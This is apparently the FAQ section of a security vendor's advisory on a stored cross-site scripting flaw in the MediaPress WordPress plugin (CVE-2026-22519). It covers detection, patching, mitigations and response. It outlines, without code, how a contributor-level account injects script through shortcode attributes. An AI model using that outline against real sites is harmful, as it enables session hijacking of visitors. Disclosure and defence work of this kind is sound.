To determine if your site is vulnerable, check the version of the MediaPress plugin installed. If it is version 1.6.2 or earlier, your site is at risk. Additionally, review user roles to see if any contributors have access to create or edit gallery content.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in MediaPress version 1.6.3. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the updated version from the plugin repository.
What does the CVSS score of 6.4 indicate?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it requires authenticated access to exploit, the potential impact on users could lead to significant security issues, such as session hijacking or content manipulation.
What are the practical risks associated with this vulnerability?
Potential consequences
Exploitation of this vulnerability could allow attackers to inject malicious JavaScript that executes in the browsers of users who view the affected gallery pages. This can lead to session hijacking, unauthorized actions on behalf of users, or redirection to malicious sites.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided illustrates how an attacker can log into a vulnerable WordPress site as a contributor and inject a malicious script via shortcode attributes. This script would then execute in the browsers of users viewing the gallery, demonstrating the real-world implications of the vulnerability.
What steps can I take to mitigate this issue if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider temporarily removing contributor access from untrusted users or disabling the MediaPress plugin until a patch can be applied. Additionally, monitor your site for any suspicious activity related to user-generated content.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating the plugin, consider implementing security plugins that provide web application firewalls, input validation, and monitoring for suspicious activity. Regularly review user roles and permissions to ensure that only trusted users have access to create or edit content.
What should I do if I suspect my site has been compromised?
Response to exploitation
If you suspect exploitation of this vulnerability, immediately revoke access for affected users, update the plugin, and conduct a thorough security audit of your site. Check for unauthorized changes or injected scripts and restore from a clean backup if necessary.
Where can I find more information about this vulnerability?
Further resources
For more information about CVE-2026-22519, refer to the official CVE database, security advisories from WordPress, and detailed reports from security research organizations like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations